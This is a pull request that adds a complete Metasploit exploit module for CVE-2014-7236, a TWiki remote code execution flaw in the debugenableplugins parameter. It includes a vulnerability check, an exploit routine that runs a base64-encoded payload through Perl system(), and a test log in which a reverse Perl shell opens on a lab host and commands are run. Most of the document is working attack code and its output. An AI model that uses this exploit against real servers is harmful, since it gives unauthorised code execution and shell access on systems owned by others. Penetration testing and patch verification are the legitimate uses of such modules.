### PR TITLE
CVE-2014-7236 TWikie Remote Code Execution

### DIFF
--- a/modules/exploits/unix/http/twiki_debug_plugins.rb
+++ b/modules/exploits/unix/http/twiki_debug_plugins.rb
@@ -14,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name' => 'TWiki Debugenableplugins Remote Code Execution',
       'Description' => %q{
-        TWiki 4.0.x-6.0.0  contains a vulnerability that allows remote code execution.
+        TWiki 4.0.x-6.0.0  contains a vulnerability in the Debug functionality.
         The value of the debugenableplugins parameter is used without proper sanitization
-        in an eval function which allows remote code execution
+        in an Perl eval statement which allows remote code execution
       },
       'Author' =>
         [

--- a/modules/exploits/unix/http/twiki_debug_plugins.rb
+++ b/modules/exploits/unix/http/twiki_debug_plugins.rb
@@ -1,0 +1,101 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'TWiki Debugenableplugins Remote Code Execution',
+      'Description' => %q{
+        TWiki 4.0.x-6.0.0  contains a vulnerability that allows remote code execution.
+        The value of the debugenableplugins parameter is used without proper sanitization
+        in an eval function which allows remote code execution
+      },
+      'Author' =>
+        [
+          'Netanel Rubin', # from Check Point - Discovery
+          'h0ng10', # Metasploit Module
+
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          [ 'CVE', '2014-7236'],
+          [ 'OSVDB', '112977'],
+          [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']
+        ],
+      'Privileged' => false,
+      'Targets' =>
+        [
+          [ 'Automatic',
+            {
+              'Payload'        =>
+                {
+                  'BadChars' => "",
+                  'Compat'      =>
+                    {
+                      'PayloadType' => 'cmd',
+                      'RequiredCmd' => 'generic perl python php',
+                    }
+                },
+              'Platform' => ['unix'],
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Oct 09 2014'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),
+        OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])
+      ], self.class)
+  end
+
+
+  def send_code(perl_code)
+    uri = target_uri.path
+    data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"
+
+    res = send_request_cgi!({
+      'method' => 'POST',
+      'uri' => uri,
+      'data' => data
+    })
+
+    return res
+  end
+
+
+  def check
+    rand_1 = rand_text_alpha(5)
+    rand_2 = rand_text_alpha(5)
+
+    code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"
+    res = send_code(code)
+
+    if res and res.code == 200
+      return CheckCode::Vulnerable if res.body == rand_1 + rand_2
+    end
+    CheckCode::Unknown
+  end
+
+
+  def exploit
+    code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"
+    code += "require('MIME/Base64.pm');MIME::Base64->import();"
+    code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
+    res = send_code(code)
+    handler
+
+  end
+
+end


### PR DESCRIPTION
This module exploits a Remote Code Execution vulnerability in TWiki < 6.0.1 (CVE-2014-7236). The value of the debugenableplugins parameter is not sanitzed before it is used in a Perl eval call.

The module was tested with the TWiki Demo VM (CentOS based). A vulnerable version can be downloaded here: http://sourceforge.net/projects/twiki/files/TWiki%20for%20all%20Platforms/TWiki-6.0.0/TWiki-VM-6.0.0-1.zip/download
## Test

```
msf > use exploit/unix/http/twiki_debug_plugins
msf exploit(twiki_debug_plugins) > set payload cmd/unix/reverse_perl
msf exploit(twiki_debug_plugins) > set RHOST 192.168.178.159
msf exploit(twiki_debug_plugins) > set LHOST 192.168.178.1
msf exploit(twiki_debug_plugins) > check
[+] 192.168.178.159:80 - The target is vulnerable.
msf exploit(twiki_debug_plugins) > exploit

[*] Started reverse handler on 192.168.178.1:4444
[*] Command shell session 1 opened (192.168.178.1:4444 -> 192.168.178.159:40353) at 2015-03-18 09:59:53 +0100

whoami
apache
ls -la
total 164
drwxr-xr-x  3 apache apache  4096 Oct 26  2013 .
drwxr-xr-x 11 apache apache  4096 Mar 14 03:35 ..
-rw-r--r--  1 apache apache  5072 Oct 14  2013 .htaccess.txt
-rw-r--r--  1 apache apache  1778 Oct 26  2013 LocalLib.cfg
-rw-r--r--  1 apache apache  1786 Oct 14  2013 LocalLib.cfg.txt
-r-xr-xr-x  1 apache apache  1383 Oct 14  2013 attach
-rwxr-xr-x  1 apache apache  2050 Oct 14  2013 backuprestore
-r-xr-xr-x  1 apache apache  1384 Oct 14  2013 changes
-r-xr-xr-x  1 apache apache 31202 Oct 14  2013 configure
-r-xr-xr-x  1 apache apache  1381 Oct 14  2013 copy
-r-xr-xr-x  1 apache apache  1381 Oct 14  2013 edit
-r-xr-xr-x  1 apache apache  1382 Oct 14  2013 login
-r-xr-xr-x  1 apache apache  1382 Oct 14  2013 logon
drwxrwxr-x  2 apache apache  4096 Oct 14  2013 logos
-r-xr-xr-x  1 apache apache  1383 Oct 14  2013 manage
-r-xr-xr-x  1 apache apache  1408 Oct 14  2013 mdrepo
-r-xr-xr-x  1 apache apache  1381 Oct 14  2013 oops
-r-xr-xr-x  1 apache apache  1384 Oct 14  2013 preview
-r-xr-xr-x  1 apache apache  1382 Oct 14  2013 rdiff
-r-xr-xr-x  1 apache apache  1386 Oct 14  2013 rdiffauth
-r-xr-xr-x  1 apache apache  1385 Oct 14  2013 register
-r-xr-xr-x  1 apache apache  1383 Oct 14  2013 rename
-r-xr-xr-x  1 apache apache  1388 Oct 14  2013 resetpasswd
-r-xr-xr-x  1 apache apache  1381 Oct 14  2013 rest
-r-xr-xr-x  1 apache apache  1381 Oct 14  2013 save
-r-xr-xr-x  1 apache apache  1383 Oct 14  2013 search
-r--r--r--  1 apache apache  2144 Oct 14  2013 setlib.cfg
-r-xr-xr-x  1 apache apache  1387 Oct 14  2013 statistics
-r-xr-xr-x  1 apache apache  1388 Oct 14  2013 twiki_cgi
-r-xr-xr-x  1 apache apache  1383 Oct 14  2013 upload
-r-xr-xr-x  1 apache apache  1381 Oct 14  2013 view
-r-xr-xr-x  1 apache apache  1385 Oct 14  2013 viewauth
-r-xr-xr-x  1 apache apache  1385 Oct 14  2013 viewfile
```

If you have any questions, please let me know...
